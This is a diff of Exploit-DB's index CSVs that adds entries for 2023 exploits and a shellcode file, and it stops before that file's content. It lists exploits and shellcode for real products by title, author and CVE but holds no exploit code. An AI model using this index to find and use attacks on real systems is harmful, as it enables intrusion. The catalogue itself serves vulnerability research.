1573,exploits/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,dos,php,,2006-03-09,,1,OSVDB-23846;CVE-2006-1224,,,,, +51256,exploits/php/dos/51256.txt,"ImageMagick 7.1.0-49 - DoS",2023-04-05,nu11secur1ty,dos,php,,2023-04-05,2023-04-05,0,CVE-2022-44267,,,,, 738,exploits/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,dos,php,,2005-01-03,,1,OSVDB-12800,,,,, 10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,dos,php,80,2009-12-30,,1,,,,,http://www.exploit-db.comJoomla_1.5.15-Stable-Full_Package.zip, 21428,exploits/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,dos,php,,2002-04-27,2012-09-21,1,OSVDB-86916,,,,,https://www.securityfocus.com/bid/4635/info @@ -14555,6 +14568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35309,exploits/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,webapps,php,,2011-02-02,2014-11-21,1,,,,,,https://www.securityfocus.com/bid/46124/info 10189,exploits/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,webapps,php,,2009-11-20,,1,CVE-2009-4056;OSVDB-60467,,,,, 23010,exploits/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8386/info +51245,exploits/php/webapps/51245.txt,"bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,, 37073,exploits/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,webapps,php,,2012-04-11,2015-05-21,1,,,,,,https://www.securityfocus.com/bid/52983/info 33649,exploits/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,webapps,php,,2010-02-16,2014-06-06,1,CVE-2010-0675;OSVDB-62363,,,,,https://www.securityfocus.com/bid/38264/info 21157,exploits/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",webapps,php,,2001-11-19,2012-09-08,1,CVE-2001-0900;OSVDB-677,,,,,https://www.securityfocus.com/bid/3554/info @@ -14985,6 +14999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69 12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,, 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,, +51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,, 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,, 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,, @@ -15077,6 +15092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31858,exploits/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",webapps,php,,2008-05-28,2014-02-24,1,CVE-2008-2507;OSVDB-45673,,,,,https://www.securityfocus.com/bid/29411/info 39173,exploits/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-05,1,CVE-2014-2934;OSVDB-106743,,,,,https://www.securityfocus.com/bid/67256/info 39174,exploits/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-16,1,CVE-2014-2934;OSVDB-106741,,,,,https://www.securityfocus.com/bid/67256/info +51241,exploits/php/webapps/51241.txt,"Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)",2023-04-05,"Mostafa Farzaneh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-2846,,,,, 29606,exploits/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,webapps,php,,2007-02-15,2013-11-15,1,,,,,,https://www.securityfocus.com/bid/22578/info 10758,exploits/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,webapps,php,,2009-12-27,,1,,,,,, 27990,exploits/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",webapps,php,,2006-06-07,2013-09-01,1,CVE-2006-2973;OSVDB-26640,,,,,https://www.securityfocus.com/bid/18314/info @@ -15448,6 +15464,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38322,exploits/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,webapps,php,,2013-02-19,2015-09-25,1,,,,,,https://www.securityfocus.com/bid/58045/info 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,,2021-06-16,2021-06-16,0,,,,,, 24530,exploits/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,webapps,php,,2013-02-20,2013-02-20,0,OSVDB-90373;OSVDB-90372,,,,http://www.exploit-db.comckeditor_4.0.1_standard.zip, +51260,exploits/php/webapps/51260.txt,"CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)",2023-04-05,"Manish Pathak",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-48110,,,,, 4349,exploits/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,webapps,php,,2007-08-30,2016-11-30,1,OSVDB-38422;CVE-2007-4736,,,,, 5678,exploits/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,webapps,php,,2008-05-26,2016-11-30,1,OSVDB-45654;CVE-2008-2774,,,,, 11780,exploits/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php,,2010-03-16,,1,,,,,, @@ -16006,6 +16023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",webapps,php,80,2016-09-13,2016-09-27,1,,,,,http://www.exploit-db.comcontrexx-opensource-1.0.zip, 17682,exploits/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,webapps,php,,2011-08-17,2016-12-05,0,,,,,, 17667,exploits/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,webapps,php,,2011-08-14,2011-08-15,1,,,,,, +51250,exploits/php/webapps/51250.go,"Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)",2023-04-05,"Mayank Deshmukh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44877,,,,, 27498,exploits/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24175,,,,,https://www.securityfocus.com/bid/17282/info 27499,exploits/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24176,,,,,https://www.securityfocus.com/bid/17282/info 27497,exploits/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24174,,,,,https://www.securityfocus.com/bid/17282/info @@ -18567,6 +18585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8900,exploits/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,webapps,php,,2009-06-07,,1,OSVDB-54927;CVE-2009-2013,,,,, 50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",2021-11-08,"Martin Cernac",webapps,php,,2021-11-08,2021-11-08,0,CVE-2021-42325,,,,http://www.exploit-db.comfroxlor-0.10.29.1.tar.gz, 16051,exploits/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,webapps,php,,2011-01-26,2011-01-26,0,,,,,, +51263,exploits/php/webapps/51263.py,"Froxlor 2.0.3 Stable - Remote Code Execution (RCE)",2023-04-05,Askar,webapps,php,,2023-04-05,2023-04-05,0,CVE-2023-0315,,,,, 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-11-17,0,,,,,, 37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php,,2015-08-07,2015-08-07,0,OSVDB-125672,,,,http://www.exploit-db.comfroxlor-0.9.33.1.tar.gz, 39931,exploits/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",webapps,php,80,2016-06-13,2016-06-13,1,,,,,, @@ -19625,6 +19644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4895,exploits/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",webapps,php,,2008-01-10,2016-11-08,1,OSVDB-40336;CVE-2008-0288;OSVDB-40335;OSVDB-40334,,,,http://www.exploit-db.comimagealbum-2.0.0b2.tar.gz, 42441,exploits/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,, 24365,exploits/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",webapps,php,,2013-01-25,2013-01-25,0,CVE-2012-6290;OSVDB-89513,,,,,https://www.htbridge.com/advisory/HTB23132 +51261,exploits/php/webapps/51261.txt,"ImageMagick 7.1.0-49 - Arbitrary File Read",2023-04-05,"Cristian Giustini",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44268,,,,, 41816,exploits/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php,,2017-04-05,2017-04-05,0,,,,,, 39058,exploits/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",webapps,php,,2014-01-21,2015-12-19,1,OSVDB-102426,,,,,https://www.securityfocus.com/bid/65059/info 2647,exploits/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,webapps,php,,2006-10-24,,1,OSVDB-30017;CVE-2006-5554,,,,, @@ -20041,6 +20061,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41195,exploits/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php,,2017-01-30,2017-01-30,0,,,,,, 42529,exploits/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,, 42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php,,2017-09-12,2017-09-12,0,,,,,, +51253,exploits/php/webapps/51253.txt,"itech TrainSmart r1044 - SQL injection",2023-04-05,"Adrian Bondocea",webapps,php,,2023-04-05,2023-04-05,0,CVE-2021-36520,,,,, 41023,exploits/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php,,2017-01-11,2017-02-02,0,,,,,, 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,,2017-02-02,2017-02-02,0,,,,,, 42511,exploits/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-23,0,,,,,, @@ -24483,6 +24504,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17622,"SQL Injection (SQLi)",,,, 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,, 48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,,2020-10-29,2020-10-29,0,,,,,, +51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip, 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip, 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,, @@ -25563,6 +25585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25312,exploits/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0929;OSVDB-15100,,,,,https://www.securityfocus.com/bid/12920/info 25310,exploits/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0928;OSVDB-15098,,,,,https://www.securityfocus.com/bid/12920/info 6082,exploits/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",webapps,php,,2008-07-14,,1,OSVDB-40193;CVE-2008-7088;CVE-2008-0251,,,,, +51236,exploits/php/webapps/51236.py,"PhotoShow 3.0 - Remote Code Execution",2023-04-05,"LSCP Responsible Disclosure Lab",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 29658,exploits/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php,,2007-02-24,2013-11-18,1,CVE-2007-1101;OSVDB-33773,,,,,https://www.securityfocus.com/bid/22707/info 8289,exploits/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,webapps,php,,2009-03-25,,1,,,,,, 28662,exploits/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,webapps,php,,2006-09-25,2013-10-01,1,CVE-2006-5057;OSVDB-29161,,,,,https://www.securityfocus.com/bid/20172/info @@ -27912,6 +27935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,, +51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip, 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip, 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip, @@ -28420,6 +28444,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17632,,,,, 49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,,2021-01-05,2021-04-08,0,,,,,, 45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,,2018-12-14,2018-12-14,0,,,,,http://www.exploit-db.comresponsive_filemanager.zip, +51251,exploits/php/webapps/51251.py,"Responsive FileManager 9.9.5 - Remote Code Execution (RCE)",2023-04-05,"Galoget Latorre",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-46604,,,,, 45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80,2018-08-27,2018-08-27,1,CVE-2018-15536;CVE-2018-15535,Traversal,,,http://www.exploit-db.comResponsiveFilemanager-9.13.3.tar.gz, 41272,exploits/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",webapps,php,,2017-02-07,2017-02-07,1,,,,,http://www.exploit-db.comResponsiveFilemanager-9.11.0.zip, 41533,exploits/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,, @@ -34219,6 +34244,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,,2005-03-14,,1,OSVDB-14803;CVE-2005-0792,,,,, 996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,webapps,php,,2005-05-16,,1,,,,,, 51207,exploits/php/webapps/51207.txt,"Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,, +51240,exploits/php/webapps/51240.txt,"zstore 6.6.0 - Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,, 8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,webapps,php,,2009-04-28,,1,OSVDB-55259,,,,, 37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,webapps,php,,2012-03-25,2015-05-14,1,,,,,,https://www.securityfocus.com/bid/52720/info 33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,webapps,php,80,2014-07-02,2014-07-09,0,OSVDB-108669,,,,http://www.exploit-db.comzurmo-stable-2.6.3.faaf3b4c8596.zip, @@ -34242,6 +34268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49370,exploits/python/local/49370.txt,"dirsearch 0.4.1 - CSV Injection",2021-01-06,"Dolev Farhi",local,python,,2021-01-06,2021-01-06,0,,,,,, 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",2021-09-13,"Abhiram V",local,python,,2021-09-13,2021-09-13,0,CVE-2021-24040,,,,, 49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,,2021-01-04,2021-01-04,0,,,,,, +51249,exploits/python/remote/51249.py,"Binwalk v2.3.2 - Remote Command Execution (RCE)",2023-04-05,"Etienne Lacoche",remote,python,,2023-04-05,2023-04-05,0,CVE-2022-4510,,,,, 40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,remote,python,80,2016-07-27,2016-07-27,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comcentreon-2.5.3.tar.gz, 41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb 41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,Remote,,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb @@ -38724,6 +38751,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 780,exploits/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",dos,windows,28015,2005-01-30,,1,OSVDB-13317;CVE-2005-0325,,,,, 37299,exploits/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",dos,windows,,2015-06-16,2015-06-16,1,OSVDB-123359,,,,http://www.exploit-db.comXtMediaPlayer_0.93_Win.rar, 11176,exploits/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,dos,windows,,2010-01-16,,1,OSVDB-64386,,Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip,,http://www.exploit-db.comThunder5.9.14.1246.exe, +51265,exploits/windows/dos/51265.txt,"XWorm Trojan 2.1 - Null Pointer Derefernce DoS",2023-04-05,"TOUHAMI Kasbaoui",dos,windows,,2023-04-05,2023-04-05,0,,,,,, 15905,exploits/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,dos,windows,,2011-01-05,2016-09-27,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15905.png,http://www.exploit-db.comxynph10.zip, 941,exploits/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",dos,windows,,2005-04-13,,1,OSVDB-15509;CVE-2005-1165;CVE-2005-1164,,,,, 6072,exploits/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",dos,windows,,2008-07-13,,1,,,,,, @@ -42854,6 +42882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16568,exploits/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2006-2086;OSVDB-25001,"Metasploit Framework (MSF)",,,, 17460,exploits/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,remote,windows,,2011-06-30,2011-06-30,0,,,,,http://www.exploit-db.comProject64k_0_13.zip, 28186,exploits/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",remote,windows,,2006-07-06,2013-09-10,1,CVE-2006-3491;OSVDB-27041,,,,,https://www.securityfocus.com/bid/18871/info +51239,exploits/windows/remote/51239.py,"Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)",2023-04-05,"Patrick Hener",remote,windows,,2023-04-05,2023-04-05,0,CVE-2023-22855,,,,, 1462,exploits/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,remote,windows,21,2006-01-30,2016-10-27,1,CVE-2006-0441;OSVDB-22734,,,,, 1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21,2006-01-24,2016-10-27,1,CVE-2006-0441;OSVDB-22734,"Metasploit Framework (MSF)",,,, 1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow",2006-01-25,"Critical Security",remote,windows,,2006-01-24,2016-10-27,1,OSVDB-22734;CVE-2006-0441,,,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index d9267f3d8..0a5dc19e4 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -819,6 +819,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,, 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,, +51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,, 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,, 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,, 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",,linux_x86-64,131,2019-06-07,2019-06-07,0,,,,,, diff --git a/shellcodes/linux_x86-64/51258.txt b/shellcodes/linux_x86-64/51258.txt new file mode 100644 index 000000000..c420395e3 --- /dev/null +++ b/shellcodes/linux_x86-64/51258.txt @@ -0,0 